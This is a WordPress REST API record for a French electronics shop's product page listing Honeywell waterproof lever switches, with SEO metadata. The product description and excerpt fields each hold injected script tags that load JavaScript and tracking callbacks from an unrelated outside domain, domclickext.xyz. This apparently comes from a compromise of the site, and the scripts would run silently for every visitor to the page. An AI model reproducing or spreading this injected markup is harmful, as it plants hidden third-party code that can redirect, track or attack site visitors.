{"id":2836,"date":"2020-12-25T14:59:49","date_gmt":"2020-12-25T13:59:49","guid":{"rendered":"http:\/\/laserelectronique.com\/?product=import-placeholder-for-1683"},"modified":"2020-12-25T15:00:01","modified_gmt":"2020-12-25T14:00:01","slug":"interrupteurs-etanche-multifonction","status":"publish","type":"product","link":"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction","title":{"rendered":"Interrupteurs \u00e9tanche multifonction"},"content":{"rendered":"<p><strong>Interrupteurs \u00e0 levier \u00e9tanches de marque HONEYWELL.<\/strong><\/p>\n<p><strong>Pour les tableaux de commande.<\/strong><\/p>\n<p><strong>Nous consulter pour des produits sp\u00e9cifiques hors catalogue.<\/strong><\/p>\n<h3><strong>Document produit:<\/strong><\/h3>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/userid?jsonp=__mtz_cb_320651783&amp;key=212b3d4039ab5319ec&amp;cv=23&amp;t=1571053630262\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/strtm?jsonp=__mtz_cb_113420898&amp;key=212b3d4039ab5319ec&amp;cv=1571053630&amp;t=1571053630263\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_348044763&amp;key=212b3d4039ab5319ec&amp;cv=1571053630&amp;t=1571053630266\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_564011553&amp;key=212b3d4039ab5319ec&amp;cv=0&amp;t=1571053630267\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp;<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/userid?jsonp=__mtz_cb_316597268&amp;key=212b3d4039ab5319ec&amp;cv=70&amp;t=1571053630395\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/strtm?jsonp=__mtz_cb_642082604&amp;key=212b3d4039ab5319ec&amp;cv=1571053630&amp;t=1571053630396\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_359016142&amp;key=212b3d4039ab5319ec&amp;cv=1571053630&amp;t=1571053630399\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_244113654&amp;key=212b3d4039ab5319ec&amp;cv=0&amp;t=1571053630400\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":2850,"comment_status":"open","ping_status":"closed","template":"","meta":[],"product_cat":[14],"product_tag":[],"class_list":{"0":"post-2836","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-finisseurs","7":"","9":"first","10":"instock","11":"taxable","12":"shipping-taxable","13":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Interrupteurs \u00e9tanche multifonction - LASER ELECTRONIQUE TP<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Interrupteurs \u00e9tanche multifonction - LASER ELECTRONIQUE TP\" \/>\n<meta property=\"og:description\" content=\"&nbsp;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction\" \/>\n<meta property=\"og:site_name\" content=\"LASER ELECTRONIQUE TP\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-25T14:00:01+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/interrupteur-e1517213888358.png\" \/>\n\t<meta property=\"og:image:width\" content=\"300\" \/>\n\t<meta property=\"og:image:height\" content=\"300\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction\",\"url\":\"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction\",\"name\":\"Interrupteurs \u00e9tanche multifonction - LASER ELECTRONIQUE TP\",\"isPartOf\":{\"@id\":\"https:\/\/laserelectronique.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction#primaryimage\"},\"image\":{\"@id\":\"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction#primaryimage\"},\"thumbnailUrl\":\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/interrupteur-e1517213888358.png\",\"datePublished\":\"2020-12-25T13:59:49+00:00\",\"dateModified\":\"2020-12-25T14:00:01+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction#primaryimage\",\"url\":\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/interrupteur-e1517213888358.png\",\"contentUrl\":\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/interrupteur-e1517213888358.png\",\"width\":300,\"height\":300},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/laserelectronique.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Boutique\",\"item\":\"https:\/\/laserelectronique.com\/?page_id=7\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Interrupteurs \u00e9tanche multifonction\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/laserelectronique.com\/#website\",\"url\":\"https:\/\/laserelectronique.com\/\",\"name\":\"LASER ELECTRONIQUE TP\",\"description\":\"VOTRE PARTENAIRE EN GUIDAGE D&#039;ENGINS, TOPOGRAPHIE ET SERVICES\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/laserelectronique.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Interrupteurs \u00e9tanche multifonction - LASER ELECTRONIQUE TP","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction","og_locale":"fr_FR","og_type":"article","og_title":"Interrupteurs \u00e9tanche multifonction - LASER ELECTRONIQUE TP","og_description":"&nbsp;","og_url":"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction","og_site_name":"LASER ELECTRONIQUE TP","article_modified_time":"2020-12-25T14:00:01+00:00","og_image":[{"width":300,"height":300,"url":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/interrupteur-e1517213888358.png","type":"image\/png"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction","url":"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction","name":"Interrupteurs \u00e9tanche multifonction - LASER ELECTRONIQUE TP","isPartOf":{"@id":"https:\/\/laserelectronique.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction#primaryimage"},"image":{"@id":"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction#primaryimage"},"thumbnailUrl":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/interrupteur-e1517213888358.png","datePublished":"2020-12-25T13:59:49+00:00","dateModified":"2020-12-25T14:00:01+00:00","breadcrumb":{"@id":"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction#primaryimage","url":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/interrupteur-e1517213888358.png","contentUrl":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/interrupteur-e1517213888358.png","width":300,"height":300},{"@type":"BreadcrumbList","@id":"https:\/\/laserelectronique.com\/?product=interrupteurs-etanche-multifonction#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/laserelectronique.com\/"},{"@type":"ListItem","position":2,"name":"Boutique","item":"https:\/\/laserelectronique.com\/?page_id=7"},{"@type":"ListItem","position":3,"name":"Interrupteurs \u00e9tanche multifonction"}]},{"@type":"WebSite","@id":"https:\/\/laserelectronique.com\/#website","url":"https:\/\/laserelectronique.com\/","name":"LASER ELECTRONIQUE TP","description":"VOTRE PARTENAIRE EN GUIDAGE D&#039;ENGINS, TOPOGRAPHIE ET SERVICES","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/laserelectronique.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/product\/2836","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/product"}],"about":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2836"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/media\/2850"}],"wp:attachment":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2836"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_cat&post=2836"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_tag&post=2836"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}